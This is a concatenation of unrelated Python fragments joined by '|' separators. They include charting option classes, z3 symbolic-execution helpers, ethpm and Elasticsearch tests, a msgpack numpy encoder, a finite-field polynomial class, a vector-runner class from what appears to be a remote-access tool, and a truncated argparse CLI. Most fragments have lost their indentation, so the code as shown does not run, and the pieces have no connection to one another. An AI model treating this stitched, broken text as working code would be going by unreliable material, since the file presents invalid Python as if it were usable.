class OptionSeriesDependencywheelSonificationTracksMappingNoteduration(Options):
    @property
    def mapFunction(self):
        return self._config_get(None)
    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    @property
    def mapTo(self):
        return self._config_get(None)
    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    @property
    def max(self):
        return self._config_get(None)
    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)
    @property
    def min(self):
        return self._config_get(None)
    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)
    @property
    def within(self):
        return self._config_get(None)
    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False) |
class SymbolicBitvecGenerator():
def __init__(self):
self.unique_vector_name_counter = {}
def get_sym_bitvec(self, constraint_type, gen, bv_size=256, unique=False, **kwargs):
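        # Build a deterministic z3 label: constraint type, generation counter, and
        # each kwarg appended as "_<name><value>"; when unique=True a per-type uid
        # counter suffix keeps otherwise identical labels distinct.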
vector_name = ConstraintType[constraint_type.name].value
label_template = (vector_name + '_gen{}')
for k in kwargs:
label_template += (((('_' + k) + '{') + k) + '}')
label = label_template.format(gen, **kwargs)
if unique:
unique_id = self.unique_vector_name_counter.get(vector_name, 0)
self.unique_vector_name_counter[vector_name] = (unique_id + 1)
label = ((label + '_uid') + str(unique_id))
assert ((constraint_type != ConstraintType.CALLDATA) or ('acc' not in kwargs))
if (constraint_type == ConstraintType.CALLDATA_ARRAY):
return z3.Array(label, z3.BitVecSort(bv_size), z3.BitVecSort(8))
elif (constraint_type in [ConstraintType.CALLER, ConstraintType.ORIGIN, ConstraintType.ENTRY_ACCOUNT]):
return svm_utils.zpad_bv_right(z3.BitVec(label, svm_utils.ADDRESS_LEN), svm_utils.VECTOR_LEN)
else:
return z3.BitVec(label, bv_size)
def get_sym_balance(self, account):
return z3.BitVec(((ConstraintType.BALANCE.value + '_') + str(account.id)), 256) |
def test_to_disk_writes_minified_manifest_as_default(manifest_dir):
build({}, package_name('package'), manifest_version('ethpm/3'), version('1.0.0'), write_to_disk(manifest_root_dir=manifest_dir, manifest_name='1.0.0.json'), validate())
actual_manifest = (manifest_dir / '1.0.0.json').read_text()
assert (actual_manifest == MINIFIED_MANIFEST) |
def test_regression(df_enc):
random = np.random.RandomState(42)
y = random.normal(0, 0.1, len(df_enc))
encoder = DecisionTreeEncoder(regression=True, random_state=random)
encoder.fit(df_enc[['var_A', 'var_B']], y)
X = encoder.transform(df_enc[['var_A', 'var_B']])
transf_df = df_enc.copy()
transf_df['var_A'] = ((([0.034348] * 6) + ([(- 0.024679)] * 10)) + ([(- 0.075473)] * 4))
transf_df['var_B'] = (([0.044806] * 10) + ([(- 0.079066)] * 10))
pd.testing.assert_frame_equal(X.round(6), transf_df[['var_A', 'var_B']]) |
def modexp_lr_k_ary(a, b, n, k=5):
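    # Left-to-right k-ary modular exponentiation: precompute a^0 .. a^(2^k - 1) mod n,
    # then for each base-2^k digit of b (most significant first) square k times and
    # multiply in the digit's table entry. `_digits_of_n` is assumed to yield digits
    # least-significant first, hence the reversed() below. Sanity check: the result
    # should always equal the builtin pow(a, b, n).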
base = (2 << (k - 1))
table = ([1] * base)
for i in range(1, base):
table[i] = ((table[(i - 1)] * a) % n)
r = 1
for digit in reversed(_digits_of_n(b, base)):
for i in range(k):
r = ((r * r) % n)
if digit:
r = ((r * table[digit]) % n)
return r |
class TestExtractGridFilter(unittest.TestCase):
def make_scatter(self):
pd = tvtk.PolyData()
pd.points = (100 + (100 * random.random((1000, 3))))
verts = arange(0, 1000, 1)
verts.shape = (1000, 1)
pd.verts = verts
pd.point_data.scalars = random.random(1000)
pd.point_data.scalars.name = 'scalars'
return pd
def make_grid4scatter(self):
src = VTKDataSource()
(xmin, xmax, dx) = (100, 200, 2)
nx = (int(((xmax - xmin) / dx)) + 1)
(ymin, ymax, dy) = (100, 200, 2)
ny = (int(((ymax - ymin) / dy)) + 1)
(zmin, zmax, dz) = (100, 200, 2)
nz = (int(((zmax - zmin) / dz)) + 1)
image_data = tvtk.ImageData(origin=(xmin, ymin, zmin), spacing=(dx, dy, dz), extent=(0, (nx - 1), 0, (ny - 1), 0, (nz - 1)))
src.data = image_data
return src
def setUp(self):
e = NullEngine()
e.start()
s = e.new_scene()
self.e = e
self.s = s
grid = self.make_grid4scatter()
e.add_source(grid)
eg = ExtractGrid()
e.add_filter(eg)
nb_ticks = 6
eg.x_ratio = eg.y_ratio = eg.z_ratio = ((100 / (nb_ticks - 1)) / 2)
gpx = GridPlane()
e.add_module(gpx)
gpx.grid_plane.axis = 'x'
gpy = GridPlane()
e.add_module(gpy)
gpy.grid_plane.axis = 'y'
gpz = GridPlane()
e.add_module(gpz)
gpz.grid_plane.axis = 'z'
d = VTKDataSource()
d.data = self.make_scatter()
e.add_source(d)
self.eg = eg
self.gpx = gpx
self.gpy = gpy
self.gpz = gpz
self.scene = e.current_scene
return
def tearDown(self):
self.e.stop()
return
    def test_extract_grid_filter_sample(self):
        """Test if the sample rate works."""
        import sys
        if (sys.platform != 'darwin'):
            raise unittest.SkipTest('actor.bounds returns incorrect values')
eg = self.eg
gpx = self.gpx
gpy = self.gpy
gpz = self.gpz
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.x_ratio = eg.y_ratio = eg.z_ratio = 25
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.x_ratio = eg.y_ratio = eg.z_ratio = 5
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
return
    def test_voi(self):
        """Test if setting the VOI works correctly."""
        import sys
        if (sys.platform != 'darwin'):
            raise unittest.SkipTest('actor.bounds returns incorrect values')
eg = self.eg
gpx = self.gpx
gpy = self.gpy
gpz = self.gpz
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.x_ratio = eg.y_ratio = eg.z_ratio = 10
eg.trait_set(x_min=10, x_max=40)
eg.x_ratio = 5
self.assertEqual(allclose(gpx.actor.actor.bounds, (120.0, 120.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (120.0, 180.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (120.0, 180.0, 100.0, 200.0, 100.0, 100.0)), True)
eg.trait_set(y_min=20, y_max=40, z_min=10, z_max=30)
eg.trait_set(x_ratio=1, y_ratio=1, z_ratio=1)
eg.trait_set(x_min=0, x_max=50, y_min=0, y_max=50, z_min=0, z_max=50)
self.assertEqual(allclose(gpx.actor.actor.bounds, (100.0, 100.0, 100.0, 200.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpy.actor.actor.bounds, (100.0, 200.0, 100.0, 100.0, 100.0, 200.0)), True)
self.assertEqual(allclose(gpz.actor.actor.bounds, (100.0, 200.0, 100.0, 200.0, 100.0, 100.0)), True) |
class TestRepositoryExists(TestCase):
def test_missing_arg(self):
client = Mock()
with pytest.raises(MissingArgument, match='No value for "repository" provided'):
repository_exists(client)
def test_repository_in_results(self):
client = Mock()
client.snapshot.get_repository.return_value = {'repo': {'foo': 'bar'}}
assert repository_exists(client, repository='repo')
def test_repo_not_in_results(self):
client = Mock()
client.snapshot.get_repository.return_value = {'not_your_repo': {'foo': 'bar'}}
assert (not repository_exists(client, repository='repo')) |
@pytest.mark.django_db
def test_child_recipient_failures(client):
create_recipient_profile_test_data(*TEST_RECIPIENT_PROFILES.values())
create_recipient_lookup_test_data(*TEST_RECIPIENT_LOOKUPS.values())
create_transaction_test_data()
non_existent_duns = ''
resp = client.get(recipient_children_endpoint(non_existent_duns, 'all'))
assert (resp.status_code == status.HTTP_400_BAD_REQUEST)
assert (resp.data['detail'] == "Recipient not found: '{}'.".format(non_existent_duns)) |
class EclrunConfig():
def __init__(self, config: EclConfig, version: str):
self.simulator_name: str = config.simulator_name
self.run_env: Optional[Dict[(str, str)]] = self._get_run_env(config.get_eclrun_env())
self.version: str = version
def _get_run_env(self, eclrun_env: Optional[Dict[(str, str)]]) -> Optional[Dict[(str, str)]]:
if (eclrun_env is None):
return None
env: dict = os.environ.copy()
if ('PATH' in eclrun_env):
env['PATH'] = ((eclrun_env['PATH'] + os.pathsep) + env['PATH'])
eclrun_env.pop('PATH')
for (key, value) in eclrun_env.copy().items():
if (value is None):
if (key in env):
env.pop(key)
eclrun_env.pop(key)
env.update(eclrun_env)
return env
def _get_available_eclrun_versions(self) -> List[str]:
try:
return subprocess.check_output(['eclrun', '--report-versions', self.simulator_name], env=self.run_env).decode('utf-8').strip().split(' ')
except subprocess.CalledProcessError:
return []
def can_use_eclrun(self) -> bool:
if (self.run_env is None):
return False
ecl_run_versions = self._get_available_eclrun_versions()
if (self.version not in ecl_run_versions):
return False
return True |
def encode_numpy(obj, chain=None):
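    # Encode numpy scalars/arrays (and cupy arrays, after copying to host) into a
    # dict of msgpack-friendly primitives; structured ('V') dtypes need the full
    # descr while plain dtypes only need the dtype string. Non-numpy objects fall
    # through to `chain`, the next encoder in line.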
if (not has_numpy):
return (obj if (chain is None) else chain(obj))
if (has_cupy and isinstance(obj, cupy.ndarray)):
obj = obj.get()
if isinstance(obj, np.ndarray):
if (obj.dtype.kind == 'V'):
kind = b'V'
descr = obj.dtype.descr
else:
kind = b''
descr = obj.dtype.str
return {b'nd': True, b'type': descr, b'kind': kind, b'shape': obj.shape, b'data': (obj.data if obj.flags['C_CONTIGUOUS'] else obj.tobytes())}
elif isinstance(obj, (np.bool_, np.number)):
return {b'nd': False, b'type': obj.dtype.str, b'data': obj.data}
elif isinstance(obj, complex):
return {b'complex': True, b'data': obj.__repr__()}
else:
return (obj if (chain is None) else chain(obj)) |
def test_base_types():
test_value = list([np.random.random((4, 2))])
out_value = map_nested_structure(test_value, mapping=(lambda x: torch.from_numpy(x)), in_place=True)
def foo(elem):
elem[0] = (elem[0] * 2)
foo(test_value)
assert (test_value is out_value)
assert (test_value[0] is out_value[0])
assert isinstance(out_value[0], torch.Tensor)
assert isinstance(test_value[0], torch.Tensor)
test_value = list([np.random.random((4, 2))])
out_value = map_nested_structure(test_value, mapping=(lambda x: torch.from_numpy(x)), in_place=False)
foo(test_value)
assert (test_value is not out_value)
assert (test_value[0] is not out_value[0])
assert isinstance(out_value[0], torch.Tensor)
assert isinstance(test_value[0], np.ndarray) |
class VectorList(list):
def __init__(self, session, module_name):
self.session = session
self.module_name = module_name
list.__init__(self)
    def find_first_result(self, names=None, format_args=None, condition=None, store_result=False, store_name=''):
        # None defaults instead of shared mutable ones: format_args is mutated below
        names = names if (names is not None) else []
        format_args = format_args if (format_args is not None) else {}
if (not callable(condition)):
raise DevException(messages.vectors.wrong_condition_type)
if (not isinstance(store_name, str)):
raise DevException(messages.vectors.wrong_store_name_type)
for vector in self:
if (not self._os_match(vector.target)):
continue
names = [n for n in names if n]
if (names and (not any(((n in vector.name) for n in names)))):
continue
format_args['current_vector'] = vector.name
result = vector.run(format_args)
try:
condition_result = condition(result)
except Exception as e:
import traceback
log.info(traceback.format_exc())
log.debug((messages.vectorlist.vector_s_triggers_an_exc % vector.name))
condition_result = False
if condition_result:
if store_result:
self.session[self.module_name]['results'][vector.name] = result
if store_name:
self.session[self.module_name]['stored_args'][store_name] = vector.name
return (vector.name, result)
return (None, None)
    def get_result(self, name, format_args=None, store_result=False):
        format_args = format_args if (format_args is not None) else {}
vector = self.get_by_name(name)
if (vector and self._os_match(vector.target)):
format_args['current_vector'] = vector.name
result = vector.run(format_args)
if store_result:
self.session[self.module_name]['results'][name] = result
return result
    def get_results(self, names=None, format_args=None, results_to_store=None):
        names = names if (names is not None) else []
        format_args = format_args if (format_args is not None) else {}
        results_to_store = results_to_store if (results_to_store is not None) else []
response = {}
for vector in self:
if (not self._os_match(vector.target)):
continue
if (names and (not any(((x in vector.name) for x in names)))):
continue
format_args['current_vector'] = vector.name
response[vector.name] = vector.run(format_args)
if (not any(((x in vector.name) for x in results_to_store))):
continue
self.session[self.module_name]['results'][vector.name] = response[vector.name]
return response
def _os_match(self, os):
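        # With no OS recorded in the session every vector matches; otherwise the
        # vector's target must be the detected OS or Os.ANY.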
os_string = self.session['system_info']['results'].get('os')
if (not os_string):
return True
os_current = (Os.WIN if os_string.lower().startswith('win') else Os.NIX)
return (os in (os_current, Os.ANY))
def get_by_name(self, name):
return next((v for v in self if (v.name == name)), None)
def get_names(self):
return [v.name for v in self] |
class PythonShellPane(TaskPane):
id = 'pyface.tasks.contrib.python_shell.pane'
name = 'Python Shell'
editor = Instance(PythonShell)
bindings = List(Dict)
commands = List(Str)
def create(self, parent):
logger.debug('PythonShellPane: creating python shell pane')
self.editor = PythonShell(parent)
self.control = self.editor.control
logger.debug('PythonShellPane: binding variables')
for binding in self.bindings:
for (name, value) in binding.items():
self.editor.bind(name, value)
logger.debug('PythonShellPane: executing startup commands')
for command in self.commands:
self.editor.execute_command(command)
logger.debug('PythonShellPane: created')
def destroy(self):
if (self.editor is not None):
logger.debug('PythonShellPane: destroying python shell pane')
self.editor.destroy()
self.editor = None
logger.debug('PythonShellPane: destroyed')
super().destroy() |
def get_entities_in_file(filename: pathlib.Path, should_delete: bool) -> Entities:
flyte_ctx = context_manager.FlyteContextManager.current_context().new_builder()
module_name = os.path.splitext(os.path.relpath(filename))[0].replace(os.path.sep, '.')
with context_manager.FlyteContextManager.with_context(flyte_ctx):
with module_loader.add_sys_path(os.getcwd()):
importlib.import_module(module_name)
workflows = []
tasks = []
module = importlib.import_module(module_name)
for name in dir(module):
o = module.__dict__[name]
if isinstance(o, WorkflowBase):
workflows.append(name)
elif isinstance(o, PythonTask):
tasks.append(name)
if (should_delete and os.path.exists(filename)):
os.remove(filename)
return Entities(workflows, tasks) |
# decorator names were stripped in the dump; restored here from the surviving
# argument lists (the bare "()" is assumed to be click.group, given the
# ctx-taking cli() entry point)
@click.group()
@click.pass_context
@jit_option('--language', callback=captive_prompt_callback((lambda language: fuzzy_reverse_dict_lookup(language, INTL_LANG_OPTIONS)), choice_prompt_func((lambda : 'Please choose your language'), get_first_options(INTL_LANG_OPTIONS))), default='English', help='The language you wish to use the CLI in.', prompt=choice_prompt_func((lambda : 'Please choose your language'), get_first_options(INTL_LANG_OPTIONS))(), type=str)
@click.option('--non_interactive', default=False, is_flag=True, help='Disables interactive prompts. Warning: with this flag, there will be no confirmation step(s) to verify the input value(s). Please use it carefully.', hidden=False)
def cli(ctx: click.Context, language: str, non_interactive: bool) -> None:
config.language = language
config.non_interactive = non_interactive |
@attrs_default
class LiveLocationAttachment(LocationAttachment):
name = attr.ib(None, type=Optional[str])
expires_at = attr.ib(None, type=Optional[datetime.datetime])
is_expired = attr.ib(None, type=Optional[bool])
    @classmethod
    def _from_pull(cls, data):
return cls(id=data['id'], latitude=((data['coordinate']['latitude'] / (10 ** 8)) if (not data.get('stopReason')) else None), longitude=((data['coordinate']['longitude'] / (10 ** 8)) if (not data.get('stopReason')) else None), name=data.get('locationTitle'), expires_at=_util.millis_to_datetime(data['expirationTime']), is_expired=bool(data.get('stopReason')))
    @classmethod
    def _from_graphql(cls, data):
target = data['target']
image = None
media = data.get('media')
if (media and media.get('image')):
image = Image._from_uri(media['image'])
return cls(id=int(target['live_location_id']), latitude=(target['coordinate']['latitude'] if target.get('coordinate') else None), longitude=(target['coordinate']['longitude'] if target.get('coordinate') else None), image=image, url=data.get('url'), name=data['title_with_entities']['text'], expires_at=_util.seconds_to_datetime(target.get('expiration_time')), is_expired=target.get('is_expired')) |
def compute_mean_similarities(results, ignore_query=False):
similarities = []
for (query_key_1, result) in results:
sims = [x[1] for x in result if ((not ignore_query) or (x[0] != query_key_1))]
if (len(sims) == 0):
similarity = None
else:
similarity = np.mean(sims)
similarities.append((query_key_1, similarity))
return similarities |
@pytest.fixture(scope='session')
def db_container(docker_backend, docker_network):
image = docker_backend.ImageClass(os.environ.get('BODHI_INTEGRATION_POSTGRESQL_IMAGE', 'quay.io/bodhi-ci/postgresql'), tag='latest')
run_opts = ['--rm', '-e', 'POSTGRES_HOST_AUTH_METHOD=trust', '--name', 'database', '--network', docker_network.get_id(), '--network-alias', 'db', '--network-alias', 'db.ci']
container = image.run_via_binary(additional_opts=run_opts)
container.start()
print(container.get_metadata())
container.wait_for_port(5432, timeout=64)
container.execute(['/usr/bin/pg_isready', '-q', '-t', '64'])
    yield container
stop_and_delete(container) |
class ScheduleDialog(QDialog):
def __init__(self, note, parent):
QDialog.__init__(self, parent, ((Qt.WindowType.WindowSystemMenuHint | Qt.WindowType.WindowTitleHint) | Qt.WindowType.WindowCloseButtonHint))
self.mw = aqt.mw
self.parent = parent
self.note = note
self.setup_ui()
self.setWindowTitle('Edit Schedule')
def setup_ui(self):
self.scheduler = QtScheduleComponent(self.note.reminder)
self.setLayout(QVBoxLayout())
c_lbl = QLabel(self)
c_icon = ('calendar_night.png' if state.is_nightmode() else 'calendar.png')
c_pixmap = QPixmap((utility.misc.get_web_folder_path() + f'icons/{c_icon}')).scaled(QSize(35, 35), Qt.KeepAspectRatio, Qt.SmoothTransformation)
c_lbl.setPixmap(c_pixmap)
hbox = QHBoxLayout()
hbox.addStretch()
hbox.addWidget(c_lbl)
hbox.addStretch()
self.layout().addSpacing(10)
self.layout().addLayout(hbox)
self.layout().addSpacing(16)
self.layout().addWidget(self.scheduler)
accept = QPushButton('Save')
accept.clicked.connect(self.accept)
hbox = QHBoxLayout()
hbox.addStretch()
hbox.addWidget(accept)
self.layout().addLayout(hbox)
def should_remove_schedule(self):
return (self.scheduler._get_schedule() == '')
def schedule(self):
return self.scheduler._get_schedule() |
class Cast(SqlTree):
type: Type
value: Sql
def _compile(self, qb):
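        # MySQL's CAST() accepts only a restricted set of target types; string-like
        # values must be cast AS CHAR (VARCHAR/TEXT are rejected), hence the special
        # case. `self.type <= T.string` is assumed to be a subtype test.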
if ((qb.target == mysql) and (self.type <= T.string)):
t = 'char'
else:
t = _compile_type(qb.target, self.type.as_nullable())
return (([f'CAST('] + self.value.compile_wrap(qb).code) + [f' AS {t})']) |
def test_deployment_addresses_genesis_hash(network):
manifest = ethpm.get_manifest('ipfs://testipfs-complex')
ropsten = ethpm.get_deployment_addresses(manifest, 'ComplexNothing', ROPSTEN_GENESIS_HASH)
assert (len(ropsten) == 1)
network.connect('ropsten')
assert (ropsten == ethpm.get_deployment_addresses(manifest, 'ComplexNothing')) |
def test_precision_value_judged_only_scores():
current = pd.DataFrame(data=dict(user_id=['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], prediction=[1.25, 1.0, 0.3, 0.9, 0.8, 0.7, 1.0, 0.5, 0.3], target=[1, 0, 0, 0, 0, 0, 0, 0, 1]))
metric = PrecisionTopKMetric(k=3, no_feedback_users=True)
report = Report(metrics=[metric])
column_mapping = ColumnMapping()
report.run(reference_data=None, current_data=current, column_mapping=column_mapping)
results = metric.get_result()
assert (len(results.current) == 3)
assert np.isclose(results.current[1], 0.333333)
assert np.isclose(results.current[2], 0.166666)
assert np.isclose(results.current[3], 0.222222) |
class DefaultRAGGraphFactory(RAGGraphFactory):
def __init__(self, system_app=None, default_model_name: str=None, **kwargs: Any) -> None:
super().__init__(system_app=system_app)
self._default_model_name = default_model_name
self.kwargs = kwargs
from dbgpt.rag.graph_engine.graph_engine import RAGGraphEngine
self.rag_engine = RAGGraphEngine(model_name='proxyllm')
def init_app(self, system_app):
pass
def create(self, model_name: str=None, rag_cls: Type=None):
if (not model_name):
model_name = self._default_model_name
return self.rag_engine |
class XLMRPreDecoder(FairSeqPreDecoder):
def __init__(self, *, bos_id: int, eos_id: int):
self.bos_id = bos_id
self.eos_id = eos_id
super(XLMRPreDecoder, self).__init__(bos_id=bos_id, eos_id=eos_id, piece_updater=XLMRPreDecoder._fairseq_to_sentencepiece)
    @staticmethod
    def _fairseq_to_sentencepiece(piece_id: int):
if (piece_id == FAIRSEQ_PIECE_IDS.FAIRSEQ_UNK):
return FAIRSEQ_PIECE_IDS.SPP_UNK
elif (piece_id == FAIRSEQ_PIECE_IDS.FAIRSEQ_BOS):
return FAIRSEQ_PIECE_IDS.SPP_BOS
elif (piece_id == FAIRSEQ_PIECE_IDS.FAIRSEQ_EOS):
return FAIRSEQ_PIECE_IDS.SPP_EOS
else:
return (piece_id - _XLMR_FAIRSEQ_OFFSET) |
class TestDataStreamStats():
def test_failure_if_feature_not_implemented_in_version(self):
clients = {'default': Client(info={'version': {'number': '7.6.0'}})}
cfg = create_config()
metrics_store = metrics.EsMetricsStore(cfg)
telemetry_params = {'data-stream-stats-sample-interval': random.randint(1, 100)}
t = telemetry.DataStreamStats(telemetry_params, clients, metrics_store)
with pytest.raises(exceptions.SystemSetupError, match='The data-stream-stats telemetry device can only be used with clusters from version 7.9 onwards'):
t.on_benchmark_start()
def test_failure_if_feature_not_implemented_in_distribution(self):
clients = {'default': Client(info={'version': {'number': '7.9.0', 'build_flavor': 'oss'}})}
cfg = create_config()
metrics_store = metrics.EsMetricsStore(cfg)
telemetry_params = {'data-stream-stats-sample-interval': random.randint(1, 100)}
t = telemetry.DataStreamStats(telemetry_params, clients, metrics_store)
with pytest.raises(exceptions.SystemSetupError, match='The data-stream-stats telemetry device cannot be used with an OSS distribution of Elasticsearch'):
t.on_benchmark_start()
def test_negative_sample_interval_forbidden(self):
clients = {'default': Client(), 'cluster_b': Client()}
cfg = create_config()
metrics_store = metrics.EsMetricsStore(cfg)
telemetry_params = {'data-stream-stats-sample-interval': ((- 1) * random.random())}
with pytest.raises(exceptions.SystemSetupError, match="The telemetry parameter 'data-stream-stats-sample-interval' must be greater than zero but was .*\\."):
telemetry.DataStreamStats(telemetry_params, clients, metrics_store) |
class FQP(object):
degree: int = 0
field_modulus: Union[(int, None)] = None
mc_tuples: Union[(List[Tuple[(int, int)]], None)] = None
def __init__(self, coeffs: Sequence[IntOrFQ], modulus_coeffs: Sequence[IntOrFQ]=()) -> None:
if (self.field_modulus is None):
raise AttributeError("Field Modulus hasn't been specified")
if (len(coeffs) != len(modulus_coeffs)):
raise Exception("coeffs and modulus_coeffs aren't of the same length")
if isinstance(coeffs[0], int):
self.coeffs = tuple(((coeff % self.field_modulus) for coeff in coeffs))
else:
self.coeffs = tuple(coeffs)
self.modulus_coeffs = tuple(modulus_coeffs)
self.degree = len(self.modulus_coeffs)
def __add__(self: T_FQP, other: T_FQP) -> T_FQP:
if (not isinstance(other, type(self))):
raise TypeError(f'Expected an FQP object, but got object of type {type(other)}')
return type(self)([(int((x + y)) % self.field_modulus) for (x, y) in zip(self.coeffs, other.coeffs)])
def __sub__(self: T_FQP, other: T_FQP) -> T_FQP:
if (not isinstance(other, type(self))):
raise TypeError(f'Expected an FQP object, but got object of type {type(other)}')
return type(self)([(int((x - y)) % self.field_modulus) for (x, y) in zip(self.coeffs, other.coeffs)])
def __mod__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
raise NotImplementedError('Modulo Operation not yet supported by fields')
def __mul__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
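        # Scalar case: multiply each coefficient. Polynomial case: schoolbook
        # multiplication into a (2*degree - 1)-wide buffer, then reduce from the top
        # using the sparse (index, coefficient) pairs of the modulus polynomial
        # stored in mc_tuples.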
if isinstance(other, int):
return type(self)([((int(c) * other) % self.field_modulus) for c in self.coeffs])
elif isinstance(other, FQP):
b = ([0] * ((self.degree * 2) - 1))
inner_enumerate = list(enumerate(other.coeffs))
for (i, eli) in enumerate(self.coeffs):
for (j, elj) in inner_enumerate:
b[(i + j)] += int((eli * elj))
for exp in range((self.degree - 2), (- 1), (- 1)):
top = b.pop()
for (i, c) in self.mc_tuples:
b[(exp + i)] -= (top * c)
return type(self)([(x % self.field_modulus) for x in b])
else:
raise TypeError(f'Expected an int or FQP object, but got object of type {type(other)}')
def __rmul__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
return (self * other)
def __div__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
if isinstance(other, int):
return type(self)([((int(c) * prime_field_inv(other, self.field_modulus)) % self.field_modulus) for c in self.coeffs])
elif isinstance(other, type(self)):
return (self * other.inv())
else:
raise TypeError(f'Expected an int or FQP object, but got object of type {type(other)}')
def __truediv__(self: T_FQP, other: Union[(int, T_FQP)]) -> T_FQP:
return self.__div__(other)
def __pow__(self: T_FQP, other: int) -> T_FQP:
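        # Binary square-and-multiply; o starts as the identity polynomial [1, 0, ...].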
o = type(self)(([1] + ([0] * (self.degree - 1))))
t = self
while (other > 0):
if (other & 1):
o = (o * t)
other >>= 1
t = (t * t)
return o
def optimized_poly_rounded_div(self, a: Sequence[IntOrFQ], b: Sequence[IntOrFQ]) -> Sequence[IntOrFQ]:
dega = deg(a)
degb = deg(b)
temp = [x for x in a]
o = [0 for x in a]
for i in range((dega - degb), (- 1), (- 1)):
o[i] = int((o[i] + (temp[(degb + i)] * prime_field_inv(int(b[degb]), self.field_modulus))))
for c in range((degb + 1)):
temp[(c + i)] = (temp[(c + i)] - o[c])
return [(x % self.field_modulus) for x in o[:(deg(o) + 1)]]
def inv(self: T_FQP) -> T_FQP:
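        # Extended Euclidean algorithm over the polynomial ring: (lm, hm) track the
        # Bezout coefficients while (low, high) are reduced, so lm ends up as the
        # inverse up to a scalar, normalized by the final division by low[0].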
(lm, hm) = (([1] + ([0] * self.degree)), ([0] * (self.degree + 1)))
(low, high) = (cast(List[IntOrFQ], list((self.coeffs + (0,)))), cast(List[IntOrFQ], list((self.modulus_coeffs + (1,)))))
while deg(low):
r = cast(List[IntOrFQ], list(self.optimized_poly_rounded_div(high, low)))
r += ([0] * ((self.degree + 1) - len(r)))
nm = [x for x in hm]
new = [x for x in high]
for i in range((self.degree + 1)):
for j in range(((self.degree + 1) - i)):
nm[(i + j)] -= (lm[i] * int(r[j]))
new[(i + j)] -= (low[i] * r[j])
nm = [(x % self.field_modulus) for x in nm]
new = [(int(x) % self.field_modulus) for x in new]
(lm, low, hm, high) = (nm, new, lm, low)
return (type(self)(lm[:self.degree]) / low[0])
def __repr__(self) -> str:
return repr(self.coeffs)
def __eq__(self: T_FQP, other: T_FQP) -> bool:
if (not isinstance(other, type(self))):
raise TypeError(f'Expected an FQP object, but got object of type {type(other)}')
for (c1, c2) in zip(self.coeffs, other.coeffs):
if (c1 != c2):
return False
return True
def __ne__(self: T_FQP, other: T_FQP) -> bool:
return (not (self == other))
def __neg__(self: T_FQP) -> T_FQP:
return type(self)([(- c) for c in self.coeffs])
    @property
def sgn0(self: T_FQP) -> int:
sign = 0
zero = 1
for x_i in self.coeffs:
sign_i = mod_int(x_i, 2)
zero_i = (x_i == 0)
sign = (sign or (zero and sign_i))
zero = (zero and zero_i)
return sign
    @classmethod
    def one(cls: Type[T_FQP]) -> T_FQP:
return cls(([1] + ([0] * (cls.degree - 1))))
    @classmethod
    def zero(cls: Type[T_FQP]) -> T_FQP:
return cls(([0] * cls.degree)) |
class TestConfigYamlDict(unittest.TestCase):
test_filename = './config.yaml'
test_dict = {'test_dict': [{'test_key_1': 'test_value_1'}, {'test_key_1': 'test_value_2'}]}
valid_data = json.dumps(test_dict)
invalid_data = '\n test_dict:\n test_key_1: test_value_1\n test_key_2\n '
    @mock.patch('builtins.open', new_callable=mock_open, read_data=valid_data)
def test_load_from_file_success(self, mock_file) -> None:
self.assertEqual(open(self.test_filename).read(), self.valid_data)
load_data = ConfigYamlDict.from_file(self.test_filename)
self.assertEqual(load_data, self.test_dict)
    @mock.patch('builtins.open', new_callable=mock_open, read_data=invalid_data)
def test_load_from_invalid_file(self, mock_file) -> None:
self.assertEqual(open(self.test_filename).read(), self.invalid_data)
with self.assertRaises(ConfigYamlFileParsingError) as error_context:
ConfigYamlDict.from_file(self.test_filename)
self.assertTrue(str(error_context.exception).startswith(f'''
{self.test_filename} is not a valid YAML file.
Please make sure that the content of your config is a valid YAML.
Cause:''')) |
def main():
ap = argparse.ArgumentParser(description='Merge master TSV with additional lexemes in batch')
ap.add_argument('--quiet', '-q', action='store_false', dest='verbose', default=False, help='do not print output to stdout while processing')
ap.add_argument('--verbose', '-v', action='store_true', default=False, help='print each step to stdout while processing')
ap.add_argument('--version', '-V', action='version')
ap.add_argument('--input', '-i', required=True, dest='infilename', metavar='IFILE', help='read dictionary data from IFILE')
ap.add_argument('--merge', '-m', required=True, dest='mergefilename', metavar='MFILE', help='read auxiliary data from MFILEs')
ap.add_argument('--output', '-o', action='store', required=True, dest='outfilename', metavar='OFILE', help='write resulting data to OFILE')
ap.add_argument('--fields', '-f', action='store', type=int, default=3, metavar='N', help='read N fields from master')
